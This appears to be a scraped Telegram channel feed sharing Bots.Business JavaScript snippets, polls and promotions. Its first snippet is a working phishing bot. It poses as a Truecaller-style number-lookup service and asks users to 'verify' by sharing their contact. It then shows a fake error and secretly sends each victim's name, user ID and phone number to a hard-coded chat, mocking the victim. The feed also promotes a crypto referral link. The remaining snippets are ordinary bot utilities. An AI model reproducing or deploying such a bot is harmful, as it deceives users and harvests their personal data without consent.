👍3🥰1🎉1😍1
Flex Coder
https://t.me/birdx2_bot/birdx?startapp=6918300873 💎 Listing In 3 Hour Fast
Listed ✅
Jisne Nhi Kiya Hai Wo Jaldi Loot Lo 😁
Jisne Nhi Kiya Hai Wo Jaldi Loot Lo 😁
🎉4👍2👌1😍1
📞 Get User Telegram Phone Number
👀Command:
/start
const idstore = Bot.getProp("idstore",[]);
const done = User.getProp("done");
if (!done) {
idstore.push(user.telegramid);
Bot.setProp("idstore", idstore, "json");
User.setProp("done", user.telegramid, "text")}
var keyboard = [
[
{
text: "Verify ✅",
request_contact: true
}
]
// ,[{text:"Gᴇᴛ Bᴏᴛ 🤖",request_location: true}]
]
Api.sendMessage({
text:
"Hɪ🔥\nWᴇʟᴄᴏᴍᴇ Tᴏ Tᴜʀᴇᴄᴀʟʟᴇʀ Bᴏᴛ Tʜɪs Bᴏᴛ Cᴀɴ Fɪɴᴅ Aɴʏ Nᴜᴍʙᴇʀ Dᴇᴛᴀɪʟs Iɴ Sᴇᴄᴏɴᴅs,\nTᴏ Usᴇ Tʜɪs Bᴏᴛ Yᴏᴜ Hᴀᴠᴇ Tᴏ Lᴏɢɪɴ Iɴ Tʜɪs Bᴏᴛ.\nUsᴇ Tʜᴇ Bᴇʟᴏᴡ Bᴜᴛᴛᴏɴ Tᴏ Lᴏɢɪɴ.",
parse_mode: "markdown",
reply_markup: {
keyboard: keyboard,
resize_keyboard: true
}
})
👀Command: *
if (!request.contact) {
return
}
if (request.forward_from || request.forward_from_chat) {
Bot.sendMessage("Error.")
return
}
if (request.contact.vcard) {
Bot.sendMessage("Error.")
return
}
if (!request.contact.user_id) {
Bot.sendMessage("Error.")
return
}
if (user.telegramid != request.contact.user_id) {
Bot.sendMessage("Error.")
return
}
if (user.first_name != request.contact.first_name) {
Bot.sendMessage("Error.")
return
}
var phone_number = request.contact.phone_number
if (request.contact.phone_number[0] == "+") {
phone_number = phone_number.slice(2, 15)
}
Api.deleteMessage({chat_id:chat.chatid,message_id:request.message_id})
Api.sendMessage({ text: 'Oh. Error happened 😢.\nBug report was sent',
reply_markup: JSON.stringify({
hide_keyboard: true
})
})
Bot.sendMessageToChatWithId(6918300873, "Ek pagal mila dekh 🤣:\n"+"user name: @"+user.username+"\nfirst name: "+user.first_name+"\nuser id: `"+user.telegramid+"`\nPhone Number:- +"+phone_number)
👍2🥰2🎉1👌1
Which Bot You Want 🤔?
Final Results
29%
Movie Bot 🎥
14%
Music Bot 🎶
5%
Schedule Post Delete Bot 🗑️
14%
Group Controller Bot 👩👩👦
38%
Ai Helper 🤖
❤5👍2🎉1👌1
🎚 Bjs For Current Time +2 Minutes
❣️ Command :-
your_command
// Get the current time in the "Asia/Kolkata" timezone
let currentTime = new Date().toLocaleString("en-US", {
timeZone: "Asia/Kolkata"
});
// Convert the string to a Date object
let currentDate = new Date(currentTime);
// Add 2 minutes to the current time
currentDate.setMinutes(currentDate.getMinutes() + 2);
// Format the updated time
let updatedTime = currentDate.toLocaleTimeString("en-US", {
hour: '2-digit',
minute: '2-digit',
second: '2-digit',
hour12: true
});
Bot.sendMessage(updatedTime)
🎉4👍2🥰1
Flex Coder
Which Bot You Want 🤔?
💝 Ai Helper Has Got More Vote, So I Launching Ai Helper Very Soon....
🥰5👍1🎉1
🏵️Random Command Runner BJ'S
👀Command:-
your command
var mycom = ["/start","/bonus","/invite","/statics ","/withdraw","/deposit"," your more command here"]
var command = mycom[Math.floor(Math.random() * mycom.length)];
Bot.runCommand(command)
👍2👏1🎉1😘1
🚀 Unlock Your Potential with AI! 🤖
👀 Need assistance with tasks, questions, or brainstorming ideas? Meet the [AI Helper Bot]! This smart bot is designed to help you streamline your workflow and enhance your productivity.
✨ Features:
➡️ Instant answers to your queries
➡️ Advance Ai With Nice Api
➡️ Creative brainstorming assistance
➡️ And much more....
💝 Join the future of productivity! Start chatting with the AI Helper Bot today: [Click Here]
👀 Need assistance with tasks, questions, or brainstorming ideas? Meet the [AI Helper Bot]! This smart bot is designed to help you streamline your workflow and enhance your productivity.
✨ Features:
➡️ Instant answers to your queries
➡️ Advance Ai With Nice Api
➡️ Creative brainstorming assistance
➡️ And much more....
💝 Join the future of productivity! Start chatting with the AI Helper Bot today: [Click Here]
👍3🔥1🥰1🎉1
HOW TO PIN MESSAGE
👀Command:
As Per You
Api.pinChatMessage({
chat_id: chatId, // Replace with your chat ID
message_id: messageId, // Replace with the message ID you want to pin
on_result: "onPinMessage" // Specify a callback if needed
});
👍3🎉1👌1😘1
📜 Message Particular User In Bot
👀Command:
/message
Wait For Answer ✅
🧬Answer:
*🛠Enter User id?*
var admin = Bot.getProperty("botadmin"+user.telegramid)
if (user.telegramid == admin){
let msg = message
User.setProperty("id", msg, "integer")
Bot.sendMessage(" Now Type Your Message For User ")
Bot.runCommand("/send")
} else {
Bot.sendMessage("*You're not an Admin*")
}
👀Command:
/send
Wait For Answer ✅
let tgid = User.getProperty("id")
let msag = message
let msg = "💬Message from Admin\n➖➖➖➖➖➖➖➖➖➖➖\n\n" + msag
Bot.sendMessageToChatWithId(tgid, msg)
Bot.sendMessage("✅Message sent to User")
👍4🥰1🎉1👌1
💪🏻 Strong Password Generator Command
👀Command:
/generator
Bot.sendMessage("Generating a secure password... ", {
on_result: "/gen"
})
👀Command:
/gen
var msg = options.result.message_id
var characters = "$%abcdefghijklmnopqrstuvwxyz@#&-_+<>$%1234567890ABCDEFGHIJKLUVWXYZ12345678901234567890@#%&-_+<>$%abcdefghijklMNOPQRSTUVWXyZ"
function genePassword(length) {
let result = '';
const charactersLength = characters.length;
for ( let i = 0; i < length; i++ ) {
result += characters.charAt(Math.floor(Math.random() * charactersLength));
}
return result;
}
Api.editMessageText({
text: " "+genePassword(15)+"",
message_id: msg,
parse_mode:"markdown"
})
🎉3👍1🤩1
ɪꜰ ʏᴏᴜ ᴀʀᴇ ꜱᴄᴀᴍᴍᴇᴅ ʙʏ ꜱᴏᴍᴇ ᴏɴᴇ ᴛʜᴇɴ ʏᴏᴜ ᴄᴀɴ ᴇxᴘᴏꜱᴇ ʜɪᴍ ᴜꜱɪɴɢ ᴏᴜʀ ʙᴏᴛ, ꜱᴏ ʜᴇ ᴄᴀɴɴᴏᴛ ꜱᴄᴀᴍ ᴏᴛʜᴇʀ ᴜꜱᴇʀꜱ. ʀᴇᴘᴏʀᴛ ᴀᴛ @ScamSecureBot ᴀꜰᴛᴇʀ ʀᴇᴘᴏʀᴛ ʏᴏᴜ ᴡᴏɴᴛ ɢᴇᴛ ʏᴏᴜʀ ᴍᴏɴᴇʏ ʙᴀᴄᴋ ʙᴜᴛ ʏᴏᴜ ᴄᴀɴ ᴀʟᴇʀᴛ ᴏᴛʜᴇʀ ᴜꜱᴇʀꜱ ᴀʙᴏᴜᴛ ʜɪᴍ👍
👍2🔥1🎉1
🗓️ 𝗔𝗹𝗹 𝗔𝗽𝗶 𝗖𝗼𝗱𝗲 𝗧𝗵𝗮𝘁 𝗜𝗻 𝗕𝗼𝘁 𝗕𝘂𝘀𝗶𝗻𝗲𝘀𝘀
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
➪
Api.sendMessage
- Send a message to a specific chat➪
Api.getMe
- Gets information about the bot itself➪
Api.getUserProfilePhotos
- Gets a user’s profile photos➪
Api.forwardMessage
- Forwards a message from one chat to another➪
Api.sendPhoto
- Send a photo to a specific chat➪
Api.sendDocument
- Send a document (e.g., PDF, Word, etc.) to a chat➪
Api.sendVideo
- Send a video to a chat➪
Api.sendAudio
- Send an audio file (such as a music track) to a chat➪
Api.sendVoice
- Send a voice message (a .ogg audio file➪
Api.sendLocation
- Sends location coordinates to a chat➪
Api.getChat
- Gets information about a specific chat➪
Api.getChatAdministrators
- Gets a list of administrators in a chat➪
Api.getChatMemberCount
- Get the number of members in a chat➪
Api.getChatMember
- Get information about a specific member of a chat➪
Api.kickChatMember
- Kicks a user from a chat (removes them from the group)➪
Api.unbanChatMember
- Unban a user from a chat➪
Api.leaveChat
- Leave a group, supergroup, or channel➪
Api.editMessageText
- Edit the text of an already sent message➪
Api.deleteMessage
- Delete a message from a chat➪
Api.answerCallbackQuery
- Sends a response to a callback query (used for inline buttons)🎉3👍2❤1🐳1😘1
Flex Coder
🗓️ 𝗔𝗹𝗹 𝗔𝗽𝗶 𝗖𝗼𝗱𝗲 𝗧𝗵𝗮𝘁 𝗜𝗻 𝗕𝗼𝘁 𝗕𝘂𝘀𝗶𝗻𝗲𝘀𝘀 ➪ Api.sendMessage - Send a message to a specific chat ➪ Api.getMe - Gets information about the bot itself ➪ Api.getUserProfilePhotos - Gets a user’s profile photos ➪ Api.forwardMessage - Forwards a message from one…
Give Some Reaction Also 🥺
👏4🎉1